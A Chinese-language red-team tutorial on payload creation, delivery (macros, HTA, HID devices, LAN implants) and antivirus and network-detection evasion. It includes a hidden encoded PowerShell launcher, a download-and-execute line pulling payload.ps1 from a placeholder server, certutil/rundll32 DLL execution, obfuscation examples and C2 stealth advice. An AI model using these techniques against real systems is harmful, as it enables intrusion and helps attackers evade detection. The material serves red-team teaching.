红队测试从0到1 - PART 2：有效载荷创建与投递及AV\/NIDS规避技术<\/h1>

一、有效载荷创建技术<\/h2>

3.1 一句话Powershell有效载荷<\/h3>
特点：整个第一阶段经过base64编码，使用Powershell iex(Invoke Expression)执行<\/li>
执行方式：Powershell -W Hidden -nop -noni -enc <base64 payload><\/code><\/li>
应用场景：可嵌入宏指令、HTA文件或作为OLE对象嵌入<\/li>
缺点：容易被AV检测<\/li>
<\/ul>
3.2 Windows下一句话下载和执行任意代码<\/h3>

实现方式：

Powershell<\/li>
Wscript<\/li>
mshta<\/li>
rundll32<\/li>
Wmic<\/li>
regsvr32<\/li>
MSBuild<\/li>
<\/ul>
<\/li>
Powershell示例：
Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials; iwr('http:\/\/webserver\/payload.ps1')|iex"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3.3 HID有效载荷<\/h3>

适用场景：邮件投递失败或被检测时使用<\/li>
设备选择：

Bash bunny<\/li>
橡皮鸭(Rubber ducky)<\/li>
自制Arduino pro micro<\/li>
<\/ul>
<\/li>
执行方式：

使用不同文件扩展名(bat、SCT、lnk等)执行Powershell<\/li>
将整个Empire Powershell有效载荷写入设备执行<\/li>
<\/ul>
<\/li>
优缺点：

发现机会小<\/li>
文件落地磁盘会留下较多取证证据<\/li>
<\/ul>
<\/li>
<\/ul>
3.4 不运行powershell.exe执行Powershell的方法<\/h3>
3.4.1 使用Powershdll<\/h4>

步骤：

将dll文件转换为base64：base64 Powershdll.dll > Powershdll_b64.txt<\/code><\/li>
使用HID设备传输到受害者机器<\/li>
解码为dll文件：certutil -decode Powershdll_b64.txt output.dll<\/code><\/li>
执行：rundll32 output,main "Powershell script"<\/code><\/li>
<\/ol>
<\/li>
执行base64编码脚本：
rundll32 Powershdll.dll,main [System.Text.Encoding]<\/span>::Default<\/span>.GetString([System.Convert]<\/span>::FromBase64String("BASE64"<\/span>)) ^| iex
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
其他技术<\/h4>

使用MSBuild utility构建exe文件<\/li>
构建不调用Powershell.exe的SCT文件<\/li>
<\/ul>
二、有效载荷投递方法<\/h2>
4.1 邮件投递<\/h3>


当前有效的三种方式：<\/p>

Office宏(最佳选择，多数企业默认启用)<\/li>
HTA文件(由Microsoft HTML Application Host - mshta.exe执行)<\/li>
Office DDE漏洞(已被修补，最新版Office不可用)<\/li>
<\/ol>
<\/li>

不推荐的方式：<\/p>

浏览器漏洞(除非有最新IE 0day)<\/li>
投递EXE(严格检查和行为监控)<\/li>
Microsoft Office OLE漏洞(90%被检测)<\/li>
Java偷渡式下载漏洞(多数被端点保护检测)<\/li>
<\/ul>
<\/li>

增强隐蔽性的技巧：<\/p>

检查特定Windows域后才解密执行<\/li>
检查公网IP地址确保在目标企业中执行<\/li>
<\/ul>
<\/li>
<\/ul>
4.2 物理入侵\/社会工程投递<\/h3>
4.2.1 Konboot(密码绕过工具)<\/h4>

特点：

装在USB驱动器中的便携式Linux系统<\/li>
不删除或更改密码，仅临时绕过<\/li>
商业许可证约75美元<\/li>
<\/ul>
<\/li>
域系统技巧：

拔掉LAN电缆，插入konboot USB重启<\/li>
绕过密码后重新插入LAN电缆<\/li>
<\/ul>
<\/li>
<\/ul>
4.2.2 HID设备<\/h4>

推荐设备：

Rubber ducky<\/li>
Bash bunny<\/li>
Kali Nethunter(Android手机模拟HID)<\/li>
<\/ul>
<\/li>
执行方式：

自动打开cmd\/Powershell\/记事本输入有效载荷<\/li>
创建.bat\/.vbscript\/.HTA文件并执行<\/li>
<\/ul>
<\/li>
最佳实践：

使用内存中运行的有效载荷(如Powershell Invoke-Expression)<\/li>
<\/ul>
<\/li>
<\/ul>
4.2.3 网络植入(隐藏远程后门)<\/h4>

推荐设备：LAN Turtle<\/li>
功能：

AutoSSH\/OpenVPN<\/li>
响应程序模块捕获NTLM Hash<\/li>
<\/ul>
<\/li>
部署方式：

与LAN线一起插入CPU<\/li>
使用USB充电器供电<\/li>
<\/ul>
<\/li>
<\/ul>
三、AV\/端点保护\/NIDS规避技术<\/h2>
5.1 防病毒\/端点逃避<\/h3>
5.1.1 基本原则<\/h4>

避免使用可执行文件投递有效载荷<\/li>
使用系统自带工具：

Powershell<\/li>
WMI<\/li>
mshta<\/li>
Wscript<\/li>
regsvr32等<\/li>
<\/ul>
<\/li>
<\/ul>
5.1.2 Powershell攻击有效性<\/h4>

Win10有AMSI(防恶意程序扫描接口)增加难度<\/li>
多数企业仍使用Win7<\/li>
<\/ul>
5.1.3 混淆技术<\/h4>

推荐工具：

Invoke-Obfuscation<\/li>
Revoke-Obfuscation<\/li>
Invoke-CradleCrafter<\/li>
Invoke-DOSfuscation<\/li>
<\/ol>
<\/li>
示例：

原始命令：Write-Host 'Test Obfuscation' -Import test<\/code><\/li>
混淆后：
.("{2}{1}{0}"<\/span> -f<\/span> 't'<\/span>,'s'<\/span>,'Write-Ho'<\/span>)("{2}{5}{1}{3}{0}{4}"<\/span> -f<\/span> 'scatio'<\/span>,'st'<\/span>,'T'<\/span>,'Obfu'<\/span>,'n'<\/span>,'e'<\/span>) -Import ("{1}{0}"<\/span> -f<\/span> 'est'<\/span>,'t'<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
其他工具：Veil和Shellter(处理可执行文件)<\/li>
<\/ul>
5.2 NIDS逃避<\/h3>
5.2.1 基于签名的NIDS<\/h4>

特点：匹配已知恶意软件流量规则<\/li>
规避方法：

修改C2指纹：

C2服务器域名<\/li>
协议<\/li>
URL<\/li>
User-Agent<\/li>
服务器版本<\/li>
默认页面等<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
5.2.2 基于异常流量的NIDS<\/h4>

特点：构建正常流量规则，机器学习检测异常<\/li>
<\/ul>
规避技术：<\/h5>


选择正确的C2通信协议<\/strong><\/p>

可选协议：TCP, HTTP(s), DNS, ICMP或自定义协议<\/li>
最佳选择：混合流量，常用协议如HTTP或DNS<\/li>
DNS限制：传输速度慢，大量加密请求可能引起怀疑<\/li>
<\/ul>
<\/li>

选择正确的C2域名<\/strong><\/p>

避免使用IP地址<\/li>
检查域名声誉<\/li>
优先选择：

医疗保健或金融类域名<\/li>
老域名(非新购)<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

在正常流量中混合C2流量<\/strong><\/p>

增加回调时间(默认5s)<\/li>
使用抖动和更长延迟<\/li>
平衡操作效率与隐蔽性<\/li>
<\/ul>
<\/li>

使用带合法证书的SSL加密C2流量<\/strong><\/p>

使用正规CA签名的有效证书<\/li>
加密整个通信过程<\/li>
注意目标企业是否解密SSL流量进行检查<\/li>
<\/ul>
<\/li>
<\/ol>
四、总结与关键点<\/h2>


红队测试是持续对抗过程<\/strong>：AV\/NIDS逃避技术需要不断更新<\/p>
<\/li>

因地制宜<\/strong>：根据目标安全策略选择合适的技术组合<\/p>

示例：银行IP白名单环境下可使用DNS进行C2通信<\/li>
<\/ul>
<\/li>

准备充分是关键<\/strong>：红队需要全面了解防御机制工作原理才能有效规避<\/p>
<\/li>

技术选择优先级<\/strong>：<\/p>

有效载荷：内存执行 > 文件落地<\/li>
投递方式：社会工程 > 纯技术攻击<\/li>
规避技术：混淆 > 直接对抗<\/li>
<\/ul>
<\/li>

持续学习<\/strong>：关注安全社区最新研究和技术发展，如AMSI绕过技术等<\/p>
<\/li>
<\/ol>